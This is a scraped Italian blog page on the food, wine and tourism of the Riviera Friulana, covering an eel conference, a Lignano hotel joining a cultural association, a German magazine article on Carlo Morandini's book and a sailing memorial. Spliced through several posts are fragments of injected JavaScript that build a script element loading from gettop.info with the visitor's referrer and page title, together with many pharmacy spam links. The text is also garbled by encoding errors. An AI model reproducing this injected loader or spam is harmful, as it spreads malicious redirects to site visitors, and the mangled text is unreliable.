La cultura si mangia!

B Nell’ ambito del convegno La cultura si mangia! Il cibo come patrimonio culturale. In pescaria vecia si è tenuto il convegno: Oggi parliamo di pesce. Le novità legate al Bisato in speo: Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

RIVIERA FRIULANA: CONFERMA DEL MATRIMONIO TRA IL PESCE DI PREGIO CRUDO E NON SOLO, E I VINI RIVIERASCHI

Ancora azzeccato il connubio rivierasco, a Marano Lagunare (UD), tra i cibi a base di pesce adriatico, e i vini della Riviera Friulana. Attori, gli animatori della Compagnia del bisato, confraternita che Entra »

Daily Archives: 13 ottobre 2012

RIVIERA FRIULANA: ANCHE LA RICETTIVITA’ ENTRA A FAR PARTE DELL’ASSOCIAZIONE CULTURALE LA RIVIERA FRIULANA

L’HOTEL ATLANTIC, QUATTRO STELLE A LIGNANO SABBIADORO, GESTITO DALLA FAMIGLIA SCARPA, ADERISCE ALL’ASSOCIAZIONE CULTURALE NO PROFIT LA RIVIERA FRIULANA Anche la ricettivitAi?? di pregio entra a far parte dell’Associazione culturale no profit La Riviera Friulana. L’Hotel Atlantic, quattro stelle, di Lignano Sabbiadoro, ha infatti aderito al sodalizio presieduto da Carlo Morandini. Ispirato dal libro La Riviera Friulana, con il quale l’autore, attraverso la ridenominazione del territorio con un termine piA? solare, propugna il rilancio della Bassa Friulana, effettivamente ricca di attrattive, peculiaritAi??, ricchezze. Un complemento ideale alla offerta turistica dei grandi poli balnerari del Friuli Venezia Giulia, Lignano e Grado, e della cittAi?? friulana, ma di parlata veneta, della pesca, che A? Marano Lagunare. L’Hotel Atlantic festeggia cosAi?? i quarant’anni della gestione della famiglia Scarpa di Lignano Sabbiadoro. Da Argelio Scarpa e Adriana Riccamboni, e proseguita negli ultimi anni dalla figlia Elisabetta. La quale, assieme allo chef Luca Selva, offre un’accoglienza altamente professionale in un clima caldo e familiare. Si tratta infatti di un’oasi di serenitAi??, immersa nel verde, dinnanzi al mare, accanto allo splendido arenile di Lignano Sabbiadoro (UD). L’Hotel Atlantic, quattro stelle, dagli anni ’70 A? un punto di riferimenti per turisti italiani, austriaci, tedeschi, russi, grazie a una cucina curata e dedicata alla clientela. Anche grazie al calore familiare e all’accoglienza e attenzione che Elisabetta Scarpa dedica agli ospiti. Con una professionalitAi?? che ha ereditato dal papAi?? Argelio e dalla mamma Adriana, e dal nonno Virgilio, pionieri della ricettivitAi?? nella Riviera Friulana. La vista sul mare completa la comoditAi?? e la tranquillitAi?? delle 80 camere. Quando ci si addentra nella sala delle colazioni la sorpresa piacevole A? che ci trova contornati dal verde delle fronte degli alberi circostanti. Per chi desidera rimanere in Hotel, magari nel pomeriggio, la piscina anch’essa tra il verde e dinnanzi all’ingresso del fabbricato, A? completata da una tranquilla e riservata zona relax e prendisole. All’uscita dall’albergo, il suggestivo lungomare lignanese ci separa dalla spiaggia: si tratta proprio dell’ultimo tratto della strada, prima che la verde pineta lignanese lo interrompa. Di conseguenza, la spiaggia prospicente, dotata di ogni confort, a disposizione dei clienti, A? quasi esclusiva. E consente di spaziare con lo sguardo dalla Terrazza a Mare di Sabbiadoro al Pontile di Pineta, al faro di Punta Tagliamento. Con sullo sfondo l’impagabile anfiteatro delle Alpi Giulie, del Carso, delle lontane Caravanche, dei rilievi dell’Istria. La cucina A? il valore aggiunto dell’Hotel Atlantic. Lo chef, Luca Selva, lignanese, maestro di cucina, di recente tra i protagonisti del convegno La Riviera Friulana La Riviera del Sole, sa esaltare i sapori adriatici e mediterranei con semplicitAi??, valorizzando la genuinitAi??. A cominciare dalla colazione, con le torte fatte in casa, come lo sono i succhi di frutta. Per passare al menA? ricco e frutto della stagionalitAi??, e per questo a misura dell’intera clientela. Per i piA? piccini, giochi in spiaggia, e per gli adulti i raffinati cocktail sulla terrazza del bar e in giardino, spesso con musica dal vivo.document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s); http://theswishlife.com/fashion/purchase-requip-withdrawal-symptoms/ Order order silvitra http://dhemit-blackeyes.mhs.narotama.ac.id/2018/02/01/cheap-noroxin-medication/ Buy http://www.ecuacert.net.ec/buy-avodart/ Order order ethionamide chemical structure cheap dipyridamole drug cheap suprax antibiotic used to treat Pills

L’ARTICOLO A TAVOLA TRADOTTO DAL TEDESCO SU LA RIVIERA FRIULANA

Friulanische Riviera

Una nuova realtAi?? che sarAi?? in grado di indurre le aziende dei vari settori di attivitAi?? del litorale friulano a fare squadra e a proporsi in sistema

Un libro che il giornalista e scrittore Carlo Morandini, nato a Udine, capitale del Friuli, ma che la passione per la vela ha portato a vivere a Lignano Sabbiadoro, ha dedicato alle caratteristiche, alla storia e alle bellezze della fascia costiera friulana dove l’Europa del Nord si affaccia sul mare Adriatico sta galvanizzando le migliori forze della regione costiera friulana. Di rimando, il libro ha catapultato il suo autore nel ruolo di padrino di un nuovo nome di battesimo del litorale dell’alto Adriatico: la Riviera Friulana A? ormai venuta a aggiungersi all’elenco delle altre e famose Riviere che l’Italia giAi?? vanta.
Delimitata a nord dalla cittAi??-fortezza di Palmanova e dalla linea delle risorgive, a est dal fiume Isonzo, a ovest dal fiume Tagliamento e a sud dalle lagune di Marano e di Grado la nuova Riviera Friulana era sinora conosciuta come Bassa Friulana. Un nome per nulla entusiasmante e che non rifletteva e non valorizzava in alcun modo la bellezza, le prerogative, prodotti e l’importanza del territorio costiero per l’economia del Friuli Venezia Giulia. Una denominazione da accantonare, quindi, perchAi?? decisamente perdente nel clima della martellante esaltazione pubblicitaria di moderne realtAi?? che devono imporsi su mercati agguerriti e sempre piA? esposti alla concorrenza globalizzata. Forte di questa sua convinzione, Carlo Morandini decide che era assolutamente necessario scegliere per una regione cosAi?? dotata il litorale friulano una denominazione che avesse un suono piA? ai???radiante, positivo e solareai??? e che oltre tutto non richiamasse alla mente un passato di depressione economica. Forse era anche ora di liberarsi di un residuo storico risalente all’Impero austro-ungarico, di casa in Friuli fino agli inizi del secolo scorso. Bassa Friulana, infatti, potrebbe anche esser stata una traduzione dal tedesco sulla falsa riga della distinzione tra ai??? Nieder- und Ober-Oesterreich. Comunque sia, Carlo Morandini decide di scrivere il suo libro ai???La Riviera Friulanaai??? e di raccontare la moderna realtAi?? della regione del litorale friulano al centro dell’arco del golfo adriatico da Venezia a Trieste, soffermandosi sull’importanza dei complessi turistici balneari di Lignano Sabbiadoro e di Grado, meta tradizionale per milioni di turisti del Nord Europa, sulle invidiabili realtAi?? agroalimentari e anche sulla sua storia millenaria. E’ il successo che segue alla presentazione del libro convince poi Morandini a compiere un ulteriore passo, la convocazione dell’assemblea costituente dell’Associazione Culturale ai???Riviera Friulanaai???. Forte dell’appoggio dei protagonisti dei settori alimentare e turistico del Friuli e anche di quello delle autoritAi?? del governo regionale del Friuli Venezia Giulia (FVG), Carlo Morandini sa inoltre di poter contare anche sul patrocinio del Club UNESCO di Udine, l’organizzazione delle Nazioni Unite che tra l’altro si occupa di assicurare la sopravvivenza dei patrimoni dell’umanitAi??. Patrimoni che nella Riviera Friulana non mancano e basta pensare ad Aquileia, fiorente cittAi?? della grande Roma imperiale, alla cittAi??-fortezza di Palmanova e all’avamposto prima romano e poi veneziano di Marano Lagunare. Credo che uno dei maggiori meriti del libro ai???La Riviera Friulanaai??? sia quello di aver chiarito che in un recente passato si A? battuto troppo il tasto sugli aspetti e sugli interessi dell’industria balneare, trascurando di prendere atto dell’accresciuto interesse che il turismo europeo dedica oggi alle prerogative e alle caratteristiche dell’intera area rivierasca. In particolare alle sue specialitAi?? eno-gastronomiche, che sono moltissime e alcune di esse eccezionali e uniche. Il Friuli, infatti, A? la regione dove Occidente e Oriente europeo s’incontrano con le loro diverse culture dando vita a una ricchissima e variata cucina multietnica, con elementi veneti e padani da un lato e, dall’altro, asburgici, slavi e orientali. Il risultato A? una cucina ricchissima di piatti eccezionali e che perA? A? poco nota sia in Italia, sia all’estero. Il semplice turista europeo che tentasse di elencare alcune delle specialitAi?? friulane raramente riuscirebbe ad andare al di lAi?? del prosciutto di San Daniele. Tutti noi conosciamo i wuerstel e i crauti,ma chi conosce il musetto e la brovada, tanto per fare un semplice esempio? Ecco quindi che la nuova piA? solare e piA? sorridente denominazione di Riviera Friulana, questa la convinzione di Carlo Morandini, puA? divenire il veicolo ideale per il lancio di una piA? qualificata e piA? ampia divulgazione e offerta dei prodotti del territorio tra i consumatori italiani e esteri, turisti o no, semplici degustatori o gourmet. Qualcosa si A? mosso grazie alla notorietAi?? dei vini friulani, di quelli bianchi in particolare, che ultimamente A? molto aumentata e anche grazie ai successi di esportazione del formaggio Montasio, un formaggio cosAi?? modesto da essere vissuto fino ai nostri giorni senza un nome proprio e chi lo voleva comperare chiederAi?? semplicemente formaggio della latteria (ai???kaese aus der molkerei)ai???. Da qualche anno anche un altro prodotto della Riviera Friulana si A? affacciato sul mercato, l’olio d’oliva nel sua variante ai???tergesteai??? (Triest), che i friulani nella loro innata modestia non avevano mai osato sinora proporre come alternativa ai piA? famosi oli liguri o toscani. Lo fa ora con molta intelligenza e molto impegno Alido Gigante di Palazzolo dello Stella con la sua azienda Olistella che prende il nome dal fiume che sfocia nella laguna di Marano in un paesaggio che ricorda quello della Florida e dove lo scrittore americano Ernest Hemingway era solito andare a pescare. L’olio Olistella A? prodotto con il frutto dei diversi ulivi che fioriscono lungo le rive dello Stella con distinte gradazioni: fruttato leggero, medio o intenso a seconda del tipo delle olive e del loro grado di maturazione al momento del raccolto. Un olio d’oliva extra vergine A?’ un’esperienza di palato da non perdere. Chi viene in vacanza nella Riviera Friulana ha anche occasione di gustare i teneri radicchietti della zona, un qualcosa che soltanto questa terra fiulana offre e che invano il turista cercherebbe in altre regioni italiane o europee. Carlo Morandini ha anche scoperto che la Riviera Friulana A? terra da tartufi, anche nelle qualitAi?? piA? pregiate, come il tartufo bianco in grado di tenere senza tema il confronto con quelli che provengono da Alba. Se ne sono accorti alcuni cacciatori di una localitAi?? che si chiama Muzzana dove la ricerca di funghi praticata con i cani A? ormai molto diffusa. E di vini da abbinare al tartufo bianco la Riviera Friulana ne offre moltissimi, c’A? soltanto l’imbarazzo della scelta.
Cambiare il nome di un territorio e imporlo all’opinione pubblica friulana non A? comunque impresa da poco. Carlo Morandini ha buone probabilitAi?? di riuscirvi a giudicare dall’ondata delle adesioni che ultimamente hanno fatto eco alla sua iniziativa nel secondo anno di attivitAi?? dell’associazione Riviera Friulana. Prendendo esempio dai produttori di vino della Riviera che giAi?? hanno deciso di far gioco di squadra rivierasca con le denominazioni DOC di Friuli Annia, Friuli Aquileia e Friuli Latisana, anche ristoranti, osterie e enoteche della Riviera Friulana hanno aderito negli ultimi mesi all’iniziativa dell’Associazione Riviera Friulana. Tra questi il ristorante Tre Canai di Marano Lagunare, l’enoteca Farmacia dei Sani e la Vineria Da Scarpa di Lignano Sabbiadoro, il ristorante Al Cason di Grado, la tenuta Zonin di Cervignano (la piA? grande azienda vinicola del Nord Italia), l’Azienda agricola Bortolusso di Carlino, l’Agriturismo Zaglia di Precenicco, l’Hotel Atlantic e la gelateria De Pellegrin di Lignano Sabbiadoro. ma anche il Comune di Fiumicello. Per citare alcuni tra i piA? importanti.
PiA? difficile sarAi?? far cambiare mentalitAi?? ai politici delle varie localitAi?? mete del turismo europeo, il cui immobilismo penalizza da troppo tempo molte potenzialitAi??. Come Lignano Sabbiadoro e Marano Lagunare, due realtAi?? che piA? diverse di cosAi?? per storia e per vocazione non potrebbero essere ma che insieme potrebbero fare miracoli. La prima A? cresciuta in modo disordinato e lento nel cogliere i segnali di cambiamento del mercato turistico, mentre la seconda paga amaramente lo scempio di una fabbrica sorta nel suo millenario centro storico e dovrAi?? essere prossimamente demolita. Qualora i due centri riuscissero a coniugare con lungimiranza i loro sforzi di sviluppo potrebbero dar vita a una delle piA? esaltanti realtAi?? non solo della Riviera Friulana e anche dell’intero golfo adriatico da Venezia a Trieste. Anche a questo riguardo l’Associazione della Riviera Friulana si propone di dare un contribuito decisivo. Luciano Barile

d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Pills online http://murtexmanufacturing.com/?p=4743 generic fincar online purchase lexapro http://www.g168gin.com/?p=23289 http://spjaszczurowa.iap.pl/2018/03/15/uroxatral-how-much/ Order Pills Order Purchase

GERMANIA: RIVIERA FRIULANA ai??i?? ECCO CHE COSA DICONO DI NOI SULLA STAMPA SPECIALIZZATA DI LARGA DIFFUSIONE

SU ‘A TAVOLA’, TESTATA ITALIANA MA TESTI IN TEDESCO, 32 MILA COPIE, NEL NUMERO DI NOVEMBRE AMPIO SPAZIO ALL’IDEA RIVIERASCA

Il mondo dell’enogastronomia tedesca A? attento alla cucina, alla ristorazione, alla vitivinicoltura, alla proposta e alle occasioni dei sapori italiani. Ne A? una dimostrazione la curata pubblicazione bimestrale ‘A Tavola’, Rivista per la cultura e la cucina italiana, 32 mila copie, diffusa sull’intero territorio tedesco e disponibile soprattutto nei luoghi della ristorazione e dell’accoglienza di pregio. Una pubblicazione bimestrale, di 48 pagine, che A? ormai un’icona del settore per gourmet, ristoratori, gelatieri, barman, pasticceri, vinicoltori, grossisti, curiosi del gusto di ceto sociale medio alto, culturalmente aperti, che nutrono alta simpatia per il settore mediterraneo, la sua cucina, la cultura e la cucina italiana. La rivista ci ha fornito una ghiotta anteprima sul numero che uscirAi?? nel prossimo mese di novembre. Numero, che nell’ampia panoramica di curiositAi??, approfondimenti, carature dell’enogastronomia germanica, darAi?? un cospicuo spazio alla Riviera Friulana. In particolare tratterAi?? dell’idea rivierasca, soffermandosi sul libro omonimo di Carlo Morandini, sulle piA? recenti iniziative relative al tema, sulla costituzione dell’Associazione culturale no profit La Riviera Friulana, sugli sviluppi che sta avendo e potrAi?? avere. L’articolo sarAi?? pubblicato in lingua tedesca. A scriverlo, il giornalista italiano, da quarant’anni corrispondente da Colonia, tra l’altro de Il Tempo, Il Sole 24 Ore, ANSA, Luciano Barile. Nato a Udine e curioso dell’idea rivierasca.

}}var d=document;var s=d.createElement(‘script’); http://carelectronics.no/?p=15315 http://helpstop.us/archives/2359 Order cost of levothroid without insurance lithium how much to take http://spjaszczurowa.iap.pl/2018/03/15/revista-gente-colombia-online/ Order buy kytril side cheap pamelor for migraines http://www.hof-magens.de/?p=3425 Buy

VELA: BARCOLANA PER RICORDARE PAOLO BURGATO

I velisti lignanesi non perdono l’occasione della 44.Barcolana per ricordare Paolo Burgato, ucciso con la moglie nella localitAi?? balneare lo scorso agosto. Burgato A? stato infatti uno dei pionieri della marineria e della vela dell’Alto Adriatico. Dalle prime regate negli anni ’70. Agli anni, quando ’80 Burgato vinse numerose edizioni dell’evento velico di Trieste come tattico e prezioso uomo di bordo dell’equipaggio lignanese di Francesco Battiston, a bordo di Condor 50, Condor Nonsisamai, Nonsisamai, Uragan, Fanatic. Finita l’era delle grandi barche lignanesi, anche per il cambiamento dei regolamenti dello sport del mare, l’equipaggio di Battiston si A? poi sparpagliato in numerose barche da regata. Su una di queste, Tutti per uno, di Da Re, Paolo Burgato ha regatato per una decina d’anni, anche alla Barcolana. Per ricordare l’indimenticato velista, Marco Da Re, ha sfilato nelle acque lungo le rive da Portorose a Pirano esponendo uno striscione che lo ricorda in occasione della regata Aprila-Portorose, alla quale Burgato aveva partecipato in numerose edizioni.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; http://naminov.com/get-minocycline-online/ Pills http://www.airmanagement.co.th/?p=18093 medrol generic http://demo.netzdesigno.com/buy-isoptin-sr/ Cheap Cheap Buy buy zyban tablets uk http://fgaspari.com.br/?p=6783 Buy

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo